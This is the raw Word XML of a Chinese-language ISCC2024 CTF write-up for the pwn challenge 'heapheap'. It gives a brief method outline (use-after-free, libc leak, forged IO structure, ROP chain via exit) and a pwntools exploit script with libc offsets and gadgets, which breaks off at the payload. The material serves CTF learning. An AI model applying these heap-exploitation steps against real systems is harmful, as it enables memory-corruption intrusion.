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29B2B" w14:textId="1126C024" w:rsidR="00E2294C" w:rsidRDefault="00C54115" w:rsidP="00C54115">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ISCC2024 WriteUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F519586" w14:textId="5D848FD1" w:rsidR="00C54115" w:rsidRDefault="00B32C31" w:rsidP="00C54115">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr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34984837" w14:textId="61A7E2FB" w:rsidR="00C54115" w:rsidRDefault="00C54115" w:rsidP="00B32C31">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wn-heapheap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D49F4" w14:textId="0DA83E10" w:rsidR="00C54115" w:rsidRDefault="00C54115" w:rsidP="00B32C31">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61368860" w14:textId="7DCDA456" w:rsidR="00C54115" w:rsidRDefault="00C54115" w:rsidP="00C54115">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用open read puts来输出flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC9AF2B" w14:textId="55266250" w:rsidR="00C54115" w:rsidRDefault="00C54115" w:rsidP="00C54115">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10417212" w14:textId="3813EBFB" w:rsidR="00C54115" w:rsidRDefault="0048740D" w:rsidP="00C54115">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F50D8A4" wp14:editId="0B941154">
            <wp:extent cx="2870348" cy="1638384"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="120041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3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4E0" w14:textId="26DEDF5D" w:rsidR="00C54115" w:rsidRDefault="00B32C31" w:rsidP="00B32C31">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照模板</w:t>
      </w:r>
      <w:r w:rsidR="00C54115">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E6118" w14:textId="77777777" w:rsidR="00B32C31" w:rsidRDefault="00C54115" w:rsidP="00C54115">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露libc拿到libc的main_arena的地址</w:t>
      </w:r>
      <w:r w:rsidR="00B32C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc基址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A4600B" w14:textId="77777777" w:rsidR="00B32C31" w:rsidRDefault="00C54115" w:rsidP="00C54115">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>覆写bk_nextsize伪造IO结构体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63562647" w14:textId="1EA6A4F5" w:rsidR="00C54115" w:rsidRDefault="00C54115" w:rsidP="00B32C31">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用exit函数触发IO执行ROP链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410CAAA" w14:textId="20129267" w:rsidR="00C54115" w:rsidRDefault="00C54115" w:rsidP="00B32C31">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63118876" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 导入必要的库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ACF175" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB7E022" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>from Crypto.Util.number import long_to_bytes, bytes_to_long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E4EE5" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="71C57929" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 设置日志级别为调试模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC60F28" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>context.log_level = 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4055B6" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 设置架构为amd64，操作系统为linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24FB56" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>context(arch='amd64', os='linux')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CAF261" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 设置终端使用 tmux 的水平分割</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C12870" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>context.terminal = ['tmux', 'splitw', '-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539292E" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="6CED910A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 设置调试时使用的gdb脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E229D6" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>scr = '''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6BE4AA" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    b _IO_flush_all_lockp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59301337" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    b exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E0D6F" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    b _IO_wfile_seekoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473616BE" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    b _IO_switch_to_wget_mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01135271" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E5D3D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="225BE31A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 定义目标程序路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2417A4" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>pwn = './3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ABB517" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="774EE3E8" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 连接远程服务器（地址和端口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A3019" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>p = remote('182.92.237.102', 11000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863E973" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="0BFFCDBA" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 以下是本地调试时的设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F841017" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># p = process(['./ld-2.31.so', pwn], env={"LD_PRELOAD": './libc-2.31.so'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A330C" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># p = process('./3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D353464" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="5D27C2C8" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 定义用于与程序交互的ELF对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5968666B" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># elf = ELF(pwn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E0911" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># libc = ELF('./libc.so.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E7DC3" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="06CB583E" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 定义添加项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204F10E" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>def add(idx, size):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A07835" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("Your choice:", "1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71306616" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("index:", str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C95C37" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("Size", str(size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE39E7F" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="2A4432EC" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 定义显示项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156257D6" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>def show(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D066E2" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("Your choice:", "2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07EA81" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("index:", str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC4130" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="111D9EB0" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 定义编辑项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D8E05" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>def edit(idx, con):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E259D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("Your choice:", "3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795E309" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("index:", str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C33926F" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("context:", con)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31856EB6" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="66F51368" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 定义删除项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F66E12" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>def dele(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E99AF5" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("Your choice:", "4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA6A7D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("index:", str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04342D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="2E525214" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 定义漏洞利用的主函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272397CB" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>def hack():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B830803" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t xml:space="preserve">    p.sendlineafter("Your choice:", "5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD71696" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="328A3483" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 添加项目，分配内存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D4C05" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>add(0, 0x450)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A5221" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>add(1, 0x450)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D8EA3" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>add(2, 0x440)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2975C41B" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>add(3, 0x460)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F0FED3" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="296CB547" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 编辑第1个项目内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73295A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>edit(1, b'./flag\x00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F064341" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="6E4EDB1E" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 删除第0个项目，触发漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62390B2D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>dele(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416EB229" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 显示第0个项目，泄露内存地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5AF8D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>show(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C9A34" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>p.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354788A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>p.recv(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA0E9B9" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 接收泄露的地址并进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3342C3" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>addr = u64(p.recv(6) + b'\x00\x00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B951A8A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>print(hex(addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322808F5" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 计算 libc 基地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC7D44" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>libc_base = addr - (0x750c7589cbe0 - 0x750c756b0000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E6083" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>io_all = libc_base + 0x1ED5A0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54194E04" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="69D2D3C8" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 添加项目并编辑以覆盖指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581381D0" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>add(4, 0x4f0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F67E073" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>edit(0, p64(addr) * 2 + p64(0) + p64(io_all - 0x20))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1A9E74" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="4B3D9996" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 删除并重新添加项目以进行进一步的漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539FA58" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>dele(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45B631" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>add(4, 0x4f0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B66CB" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>show(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3853504A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>p.recvuntil(b"context: \n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BF8DA" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>heap_addr = u64(p.recv(6) + b'\x00\x00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC6B875" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>print(hex(heap_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649F44AE" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="4D1AC1DE" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 设置相关的函数地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C48C1" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>libcbase = libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFC532" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>fake_io = heap_addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CCC1AB" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>IO_file_jumps = libcbase + 0x1E94A0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E80EF" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>IO_wfile_jumps = libcbase + 0x1E8F60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015130F" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>execve_addr = libcbase + 0xe3170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7389162A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>setcontext_61 = libcbase + 0x54F20 + 61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D244E67" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>lr = libcbase + 0x578C8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E0BD15" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>ret = libcbase + 0x578C9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC28540" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>pop_rdi = libcbase + 0x023b6a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7ED20D" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>pop_rsi = libcbase + 0x2601f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D027A" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>pop_rdx_r12 = libcbase + 0x0119431</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266506A5" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>open64 = libc_base + 0x10df00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBCB964" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>read_a = libc_base + 0x10e1e0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20F5D0" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>puts = libc_base + 0x84420</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E830726" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>name = heap_addr - 0x653af7781b50 + 0x653af77816f0 + 0x10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B62DCC" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>out = libc_base + 0x79ab21b9e6a0 - 0x79ab219b1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F07C1A6" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F"/>
    <w:p w14:paraId="179CF5A4" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t># 构造payload用于漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8863A0" w14:textId="77777777" w:rsidR="00174B0F" w:rsidRDefault="00174B0F" w:rsidP="00174B0F">
      <w:r>
        <w:t>pay = flat(</w:t>
      </w:r>
